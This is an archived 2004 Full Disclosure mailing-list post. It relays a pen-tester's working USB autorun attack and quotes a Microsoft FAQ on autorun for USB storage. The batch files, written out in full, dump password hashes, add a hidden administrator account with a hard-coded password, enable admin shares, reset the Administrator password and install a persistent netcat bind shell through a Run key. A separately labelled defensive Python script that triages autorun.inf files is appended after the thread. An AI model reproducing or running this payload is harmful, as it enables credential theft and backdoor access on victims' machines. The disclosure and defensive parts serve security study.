Full Disclosure mailing list archives

USB risks - working autorun example (fwd from pen-test)


From: Gadi Evron <ge () egotistical reprehensible net>
Date: Sat, 19 Jun 2004 14:56:16 +0200

Okay, just to put this point at ease: autorun.inf usage on USB drives is possible. My concerns are of a different type, a BOF or a backdoor in an SDK, or even simple usage of USB for different operational criminal needs... Still, if the simplest solution (autorun) works (and it does...), why over-complicate, as we in the security field tend to do?

Attached is a proof-of-concept as made available by mak_pen () hotmail com for using autorun with USB.

This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.

I'd strongly suggest that people read the (different) threads on the subject on the pen-test list; a lot of questions were answered there.

        Gadi Evron.

--
Email: ge () linuxbox org.  Work: gadie () cbs gov il. Backup: ge () warp mx dk.
Phone: +972-50-428610 (Cell).

PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104  C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA  569A A87E 8DB7 06C7 D450
--- Begin Message ---
From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

I have been using this "attack" for some time now. Below are the batch files (test.bat, b.bat and autorun.inf; autorun.inf calls test.bat) I use:

*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off

::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memory and it works. What happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which I have documented above.

To prevent against this I have a registry file I use to disable autorun altogether. Contact me if you need it at: mak_pen(at)hotmail(dot)com

Cheers....

From: "Fred Gravel" <mindedsmasher () hotmail com>
To: pen-test () securityfocus com
Subject: Re: USB delivered attacks
Date: Wed, 02 Jun 2004 20:02:14 +0000
Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

And after some search ... autorun is possible on a USB storage device... as is explained just below ...

http://www.microsoft.com/whdc/device/storage/usbfaq.mspx

Q: What must I do to trigger Autorun on my USB storage device?

If you need to make a USB storage device that executes Autorun, the following two conditions must both be true:

- Media must be marked as removable.
- The device can be set to either static or removable.

We associate the "removable" nature of a device with the bus that it resides on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus would be regarded as removable by default. PnP uses a bit in the DEVICE_CAPABILITIES structure to determine this. For more information, see the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located at http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.

The "removable" nature of media is a property of the device. For example, in the case of a CD-ROM or a ZIP drive, the medium can be removed without the device itself going away, but on the other hand the medium and the disk cannot be separated on static storage PC cards. We obtain this information by using the StorageDeviceProperty request. For more information, see the STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.

----

Also the autorun could be used in "cooperation" with the desktop.ini file included in the folder(s) on the USB storage device if needed...



--- End Message ---
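As an added example (not part of the thread, and neither mak_pen's nor Microsoft's code), the Python below is the defender-side counterpart to the two posts above: it parses an autorun.inf the way a triage tool would and lists what the file would launch, and it checks whether an Explorer NoDriveTypeAutoRun policy mask covers the "removable" drive type that the Microsoft FAQ says USB storage is classified as. The sample autorun.inf is constructed here, and NoDriveTypeAutoRun is my assumption for the "registry file to disable autorun" that mak_pen mentions but the thread does not spell out.

```python
"""Defender-side triage for the autorun.inf mechanism discussed in the thread (added
example; the sample .inf is constructed, NoDriveTypeAutoRun is an assumed policy)."""
import configparser

# Drive-type codes as returned by GetDriveType(); the NoDriveTypeAutoRun
# bitmask has one bit per code (bit = 1 << code); 0xFF covers every type.
DRIVE_TYPES = {"unknown": 0, "removable": 2, "fixed": 3,
               "remote": 4, "cdrom": 5, "ramdisk": 6}
# autorun.inf directives that start a program rather than set icon/label text.
LAUNCH_KEYS = ("open", "shellexecute")

# Constructed sample mirroring the thread: autorun.inf hands off to test.bat.
SAMPLE_INF = """\
; constructed sample autorun.inf (not from the original post)
[AutoRun]
open=test.bat
icon=drive.ico
action=Open folder to view files
shell\\readme\\command=notepad readme.txt
"""

def parse_autorun_inf(text):
    """Return the [autorun] section as {lowercased key: value}; {} when the
    section is missing or the text is not INI-shaped at all."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    for section in cp.sections():
        if section.lower() == "autorun":
            return dict(cp.items(section))
    return {}

def launch_targets(entries):
    """Commands the file would run: open=, shellexecute= and any
    shell\\<verb>\\command= entry (verbs show up in the drive's context menu)."""
    return [v for k, v in entries.items()
            if k in LAUNCH_KEYS or (k.startswith("shell\\") and k.endswith("\\command"))]

def autorun_disabled_for(mask, drive_type="removable"):
    """True when a NoDriveTypeAutoRun mask suppresses autorun for drive_type;
    USB storage is 'removable' per the Microsoft FAQ quoted in the thread."""
    return bool(mask & (1 << DRIVE_TYPES[drive_type]))

def triage(inf_text, policy_mask, drive_type="removable"):
    """What the .inf would launch, and whether the host policy blocks it."""
    return {"launches": launch_targets(parse_autorun_inf(inf_text)),
            "policy_blocks": autorun_disabled_for(policy_mask, drive_type)}
```

Run `triage(open("E:/autorun.inf").read(), mask)` against a mounted volume and the policy value read from HKLM\...\Policies\Explorer to see both what a stick would launch and whether the host would let it; a mask of 0xFF blocks every drive type.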
